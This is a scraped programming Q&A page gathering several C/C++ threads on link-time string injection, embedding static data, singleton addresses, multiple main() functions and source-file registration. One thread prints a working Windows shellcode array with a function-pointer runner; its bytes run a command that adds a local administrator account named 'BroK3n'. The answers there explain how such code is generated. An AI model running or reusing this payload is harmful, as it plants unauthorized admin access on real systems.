Insert string at linking time

Insert string at linking time - c++

I want to define a external global symbol (const char*) used by the program. Add the symbol at linking time with a given value. This is useful for example commit hash or build time.
I found --defsym which does something else. The Go linker supports this functionality via the -X option. (Yeah I know, Go Strings are managed, but I am talking about plain old zero terminated c strings)
For example:
extern const char *git_commit;
int main(int argc, char *argv[]) {
puts(git_commit);
return 0;
}
gcc main.o -Wl<something here that adds git_commit and set it to '84e5...'>
I am aware of config.h approach and building object files containing those string. But its 2019 by know. Such a simple task should be easy.
Edit more precise question
Is there a equivalent option in gcc/binutils for Go Linker's -X option.

There is a change to do it in compile/preprocessing time, consider this:
#include <stdio.h>
const char * git_commit = GIT_COMMIT;
int main(int argc, char ** argv) {
puts(git_commit);
return 0;
}
and in command line:
gcc -o test test.c -DGIT_COMMIT="\"This is a test\""
assuming you are using GCC compiler.

One way:
echo "char const* git_commit = \"$(git rev-parse HEAD)\";" > git_commit.c
gcc -c -o git_commit.o git_commit.c
gcc -o main main.o git_commit.o
When you implement this in a makefile you may like to only recreate git_commit.c when the revision changes, so that it doesn't relink it on each make invokation.

I'm not aware of any way to do what you're seeking to do directly via a flag using one of the commonly used linkers. In general, if you want to link the definition of such an object into your program, you'll have to provide an object file containing a suitable symbol definition.
The probably simplest way to get there would be to just invoke the compiler to compile the definition of your variable with the content being fed from a macro defined via the command line like already suggested in the other answers. If you want to avoid creating temporary source files, gcc can also receive input straight from stdin:
echo "const char git_commit[] = GIT_COMMIT;" | gcc -DGIT_COMMIT=\"asdf\" -c -o git_commit.obj -xc++ -
And in your code your just declare it as
extern const char git_commit[];
Note: I'm using const char git_commit[] rather than const char* git_commit. That way, git_commit will directly be an array of suitable size initialized to hold the contents of the commit hash. const char* git_commit, on the other hand, will create a global pointer object initialized to hold the address of a separate string literal object, which means you introduce an unnecessary indirection. Not that it will really matter here, but it also doesn't really cost you anything to skip the inefficiency, however tiny it might be…
There would also be the objcopy utility which can be used to wrap arbitrary binary content in an object file, see, e.g., here How do I embed the contents of a binary file in an executable on Mac OS X? It may even be possible to pass input to objcopy straight via stdin as well. Finally, you could also just write your own tool that directly writes an object file containing a suitable symbol definition. Consider, however, that, at the end of the day, you're seeking to generate an object file that can be linked with the other object files making up your program. Simply using the same compiler you use to compile the rest of the code is probably the most robust way of going about doing that. With other solutions, you'll always have to manually make sure that the object files are compatible in terms of target architecture, memory layout, …

You could embed it as a ressource file, for example:
GitInfoHTML HTML "GitInfo.html"
This will placed into the executable by the linker (at link time) and can then be loaded.
For more info, see:
https://learn.microsoft.com/en-us/cpp/windows/resource-files-visual-studio?view=vs-2019

Related

Storing Enormous Static Variables in C++

I have a string of information that is roughly 17 kb long. My program will not generate this string or read it into a buffer - the data is already initialized, I want it to be compiled as is from within my code, like you would a static variable. Moreover, I'd much prefer it is within my executable, and not stored within a project file. I've never before encountered such an issue, what is the best way to go around this? Should I include as resource, or literally copy and paste the enormous stream of data into a variable? What would you recommend?
Forgot to mention, am using VisualStudio C++ 2015 if that matters

The GNU linker ld has the ability to directly include custom data as the .data section of an object file:
ld -r -b binary -o example.o example.txt
The resulting example.o file has symbols defined to access start and end of the embedded data (just look at the file with objdump to see how they're named).
Now I don't know whether the linker coming with Visual Studio has a similar ability, but I guess you could use the GNU linker either via mingw or also via cygwin (since the generated object file won't reference the standard lib you won't need the emulation lib that comes with cygwin).The resulting object file apparently can just be added to your sources like a regular source file.
Of course this manual workflow isn't too good if the data changes often...
Alternatively you can write a simple program which puts the contents of the file in a C string, like:
unsigned char const * const data = {
0x12, 0x34, 0x56 };
Of course there's already such a program (xdd) but I don't know whether it's available to you. One potential issue is that you could reach the limit for the length of string literals that way. To get around that you could try a (multidimensional) char array.
(When writing this answer I found this blog post very helpful.)

How is the shell code of a Buffer Overflow generated

The following codes got my curiosity. I always look, search, and study about the exploit so called "Buffer overflow". I want to know how the code was generated. How and why the code is running?
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
int main(int argc, char **argv){
int (*f)();
f = (int (*)())shellcode;(int)(*f)();
}
Thanks a lot fella's. ^_^

A simple way to generate such a code would be to write the desired functionality in C. Then compile it (not link) using say gcc as your compiler as
gcc -c shellcode.c
This will generate an object file shellcode.o . Now you can see the assembled code using objdump
odjdump -D shellcode.o
Now you can see the bytes corresponding to the instructions in your function.
Please remember though this will work only if your shellcode doesn't call any other function or doesn't reference any globals or strings. That is because the linker has yet not been invoked. If you want all the functionality, I will suggest you generate a shared binary (.so on *NIX and dll on Windows) while exporting the required function. Then you can find the start point of the function and copy bytes from there. You will also have to copy the bytes of all other functions and globals. You will also have to make sure that the shared library is compiled as a position independent library.
Also as mentioned above this code generated is specific to the target and won't work as is on other platforms.

Machine code instructions have been entered directly into the C program as data, then called with a function pointer. If the system allows this, the assembly can take any action allowed to the program, including launching other programs.
The code is specific to the particular processor it is targetted at.

Can I get the address of a singleton during compile or link time from gcc?

I am working on a embedded project and ask me, if it is possible to get the address of a singleton class during compile or link time.
To create my singleton, I use the following code and would be interested in the address of instance.
class A
{
public:
static A& get()
{
static A instance;
return instance;
}:
What I want to do, is of course changing the value from outside using a debug probe, but not using a real debug session.
Best regards
Andreas

Without signficant knowledge of exactly what development tools, hardware architecture, etc, you are using, it's very hard to say exactly what you should do, but it's typically possible to assign certain variables to a specific data-segment or functions in a specific code-segment, and then in the linking phase assign a specific address to that segment.
For example you can use the gcc section attribute:
int init_data __attribute__ ((section ("INITDATA")));
or
MyObj obj __attribute__((section ("BATTERY_BACKED")));
and then use the same section name in a linker script that places it to the "right" address.
Most (reasonable) embedded toolchains will support this in some manner, but exactly how it is done varies quite a lot.
Another option is to use placement new:
MyObj *obj = new ((void *)0x11220000) MyObj(args);

Usually debug probes only see physical addresses while user applications only operate on virtual addresses, which change all the times the application is loaded, so no linker trick will work. You didn't say which OS you use but I guess it's Linux. If so, you can do something like this: reserve yourself a scratchpad memory area you know the physical address of and which is not used by the OS. For example if your SoC has an embedded static memory, use that, if not just ask you local Linux expert how to reserve a page of RAM into the kernel memory configuration.
Then look at this article to understand how to map a physical address into the virtual memory space of your application:
how to access kernel space from user space(in linux)?
After getting the virtual address of the scratchpad area your application can read/write there whatever it wants. The debug probe will be able to to read/write into the same area with the physical address.

You can use placement-new with a buffer whose address is available at compile or link time.
#include <new>
extern unsigned char placeA[];
class A {
public:
static A& get()
{
static A *p_instance;
if(!p_instance) {
p_instance = new(placeA) A();
}
return *p_instance;
}
};
unsigned char placeA[sizeof(A)] __attribute__ ((aligned (__BIGGEST_ALIGNMENT__)));

Not exactly sure if this is what you're trying to do, but using "-S" with gcc will stop everything after the compile stage. That way you can dive into the assembly code and evaluate your variables. Here is the man page excerpt:
If you only want some of the stages of compilation, you can use -x (or
filename suffixes) to tell gcc where to start,
and one of the options -c, -S, or -E to say where gcc is to stop. Note that
some combinations (for example, -x cpp-output -E) instruct gcc to do nothing at all.
-c Compile or assemble the source files, but do not link. The linking stage simply is not done. The ultimate
output is in the form of an object file for each source file.
By default, the object file name for a source file is made by replacing the suffix .c, .i, .s, etc., with .o.
Unrecognized input files, not requiring compilation or assembly, are ignored.
-S Stop after the stage of compilation proper; do not assemble. The output is in the form of an assembler code file
for each non-assembler input file specified.
By default, the assembler file name for a source file is made by replacing the suffix .c, .i, etc., with .s.
Input files that don't require compilation are ignored.
-E Stop after the preprocessing stage; do not run the compiler proper. The output is in the form of preprocessed
source code, which is sent to the standard output.
Input files which don't require preprocessing are ignored.

Two main functions

Can we have two main() functions in a C++ program?

The standard explicitly says in 3.6.1:
A program shall contain a global function called main, which is the designated start of the program. [...] This function shall not be overloaded.
So there can one only be one one main function in the global scope in a program. Functions in other scopes that are also called main are not affected by this, there can be any number of them.

Only one function can be named main outside of any namespace, just as for any other name. If you have namespaces foo and bar (etc) you can perfectly well have functions named foo::main, bar::main, and so on, but they won't be treated as anything special from the system's point of view (only the function named main outside of any namespace is treated specially, as the program's entry point). Of course, from your main you could perfectly well call the various foo::main, bar::main, and so on.

Yes! Why not?
Consider the following code:
namespace ps
{
int main(){return 0;}
}
int main()
{
ps::main();
}
Its ::main() that will be called during execution.

You can't overload main() in the global scope.

A program can only have one entry point, but of course that one main() function can call out to other functions, based on whatever logic you care to specify. So if you are looking for a way to effectively compile two or more programs into a single executable, you can do something like this:
int main(int argc, char ** argv)
{
if (argc > 0) // paranoia
{
if (strstr(argv[0], "frogger")) return frogger_main(argc, argv);
else if (strstr(argv[0], "pacman")) return pacman_main(argc, argv);
else if (strstr(argv[0], "tempest")) return tempest_main(argc, argv);
}
printf("Hmm, I'm not sure what I should run.\n");
return 10;
}
... then just rename your 'other' main() functions to frogger_main(), pacman_main(), or whatever names you care to give them, and you'll have a program that runs as Frogger if the executable name has the word 'frogger' in it, or runs as PacMan if the executable has the name 'pacman' in it, etc.

In one single program, only one entry point is allowed.

Ooh, trick question!
Short answer: "It depends."
Long answer: As others have pointed out, you can have multiple functions named main so long as they are in different namespaces, and only the main in the root namespace (i.e. ::main) is used as the main program. In fact, some threading libraries' thread classes have a method named main that the library user overrides with the code they want run in the thread.
Now, assuming you're not doing any namespace tricks, if you try to define ::main in two different .cpp files, the files themselves will both compile, however, the linker will abort since there are two definitions named main; it can't tell which to link.
(A question I have for the gurus out there: in C++, do the function definitions int main() {} and extern "C" int main() {} generate functions with the same signature? I haven't tried it myself.)
And now for the time you can have more than one ::main in your program's source: if one main is in a library (.a or .so file), and another is in your source (.o) files, the one in your sources wins and the one in the library is dropped, and linking succeeds unless there's some other problem! If you didn't write a main, the library's main would win. This is actually done in the support libraries that ship with lex and yacc; they provide a barebones main so you don't have to write one for a quick parser.
Which leads to an interesting application: providing a main with every library. My libraries tend to be small and focused, and so I put a main.cpp in every one with a main that is test or utility code for the library. For example, my shared memory library has a main that allows all the functions for managing shared memory to be called from the command line. Then I can test a variety of cases with a bash script. Anything that links in the shared memory library gets the test code for free, or can dispose of it simply by defining their own main.
EDIT: Just to make sure folks are clear on the concept, I'm talking about a build that looks like:
gcc -c -o bar_main.o bar_main.cpp
ar -r libbar.a bar_main.o
ranlib libbar.a
gcc -c -o foo_main.o foo_main.cpp
gcc -o foo foo_main.o -L. -lbar
In this example, the main in foo_main.o beats the main in bar_main.o. The standard doesn't define this behavior because they don't care. There's a lot of nonstandard things that people use anyway; Linux is an example with its use of C bitfields. ld has worked this way longer than I've known how to type.
Seriously, guys, feel free to strictly adhere to standards if you need to turn out least-common-denominator code. But if you have the luxury of working on a platform that can build lex and yacc programs, by all means, consider taking advantage of it.

there is only one entry point in the global scope.

Registering each C/C++ source file to create a runtime list of used sources

For a debugging and logging library, I want to be able to find, at runtime, a list of all of the source files that the project has compiled and linked. I assume I'll be including some kind of header in each source file, and the preprocessor __FILE__ macro can give me a character constant for that file, so I just need to somehow "broadcast" that information from each file to be gathered by a runtime function.
The question is how to elegantly do this, and especially if it can be done from C as opposed to C++. In C++ I'd probably try to make a class with a static storage to hold the list of filenames. Each header file would create a file-local static instance of that class, which on creation would append the FILE pointer or whatever into the class's static data members, perhaps as a linked list.
But I don't think this will work in C, and even in C++ I'm not sure it's guaranteed that each element will be created.

I wouldn't do that sort of thing right in the code. I would write a tool which parsed the project file (vcproj, makefile or even just scan the project directory for *.c* files) and generated an additional C source file which contained the names of all the source files in some kind of pre-initialized data structure.
I would then make that tool part of the build process so that every time you do a build this would all happen automatically. At run time, all you would have to do is read that data structure that was built.

I agree with Ferruccio, the best way to do this is in the build system, not the code itself. As an expansion of his idea, add a target to your build system which dumps a list of the files (which it has to know anyway) to a C file as a string, or array of strings, and compile this file into your source. This avoids a lot of complication in the source, and is expandable, if you want to add additional information, like the version number from your source code control system, who built the executable, etc.

There is a standard way on UNIX and Linux - ident. For every source file you create ID tag - usually it is assigned by you version control system, e.g. SVN keywords.
Then to find out the name and revision of each source file you just use ident command. If you need to do it at runtime check out how ident does it - source for it should be freely available.

Theres no way to do it in C. In C++ you can create a class like this:
struct Reg {
Reg( const char * file ) {
StaticDictionary::Register( file );
};
where StaticDictionary is a singleton container for all your file names. Then in each source file:
static Reg regthisfile( __FILE__ );
You would want to make the dictionary a Meyers singleton to avoid order of creation problems.

I don't think you can do this in the way you outline in a "passive" mode. That is, you are going to somehow run code for each source file to be added to the registry, it's hard to get it to happen automatically.
Of course, it's possible that you can make that code very unobtrusive using macros. It might be problematic for C source files that don't have an "entrypoint", so if your code isn't already organised as "modules", with e.g. an init() function for each module, it might be hard. Static initializing code might be possible, I'm not 100% sure if the order in which things are initialized creates problems here.
Using static storage in the registry module sounds like an excellent idea, a plain linked list or simple hash table should be easy enough to implement, if your project doesn't already include any general-purpose utility library.

In C++ your solution will work. It's guaranteed.
Edit: Just found out a solution in my head: Change a rule in your makefile to add
'-include "cfiles_register.h"' to each 'g++ file.cpp'.
%.o : %.cpp
$(CC) -include 'cfiles_register.h' -o $# $<
put your proposed in the question implemnatation to that 'cfiles_register.h'.

Using static instances in C++ would work fine.
You could do this also in C, but you need to use runtime specific features - for MSVC CRT take a look at http://www.codeguru.com/cpp/misc/misc/threadsprocesses/article.php/c6945/
For C - you could do it with a macro - define a variable named corresponding to your file, and then you could scan the symbols of your executable, just as an idea:
#define TRACK_FILE(name) char _file_tracker_##name;
use it in your my_c_file.c like this:
TRACK_FILE(my_c_file_c)
and than grep all file/variable names from the binary like this
nm my-binary | grep _file_tracker
Not really nice, but...

Horrible idea, I'm sure, but use a singleton. And on each file do something like
Singleton.register(__FILE__);
at global scope. It'll only work on cpp files though.
I did something like this years ago as a novice, and it worked. But I'd cringe to do it now. I'd add a build step now.

I agree with those who say that it is better to avoid doing this at run time, but in C, you can initialize a static variable with a function call, that is, in every file:
static int doesntmatter = register( __FILE__);

We Keep Coding

c++ django amazon-web-services regex python-2.7 google-cloud-platform list unit-testing opengl ember.js

Insert string at linking time - c++

You could embed it as a ressource file, for example: GitInfoHTML HTML "GitInfo.html" This will placed into the executable by the linker (at link time) and can then be loaded. For more info, see: https://learn.microsoft.com/en-us/cpp/windows/resource-files-visual-studio?view=vs-2019

Related

Storing Enormous Static Variables in C++

How is the shell code of a Buffer Overflow generated

Can I get the address of a singleton during compile or link time from gcc?

Two main functions

Registering each C/C++ source file to create a runtime list of used sources

Categories

Resources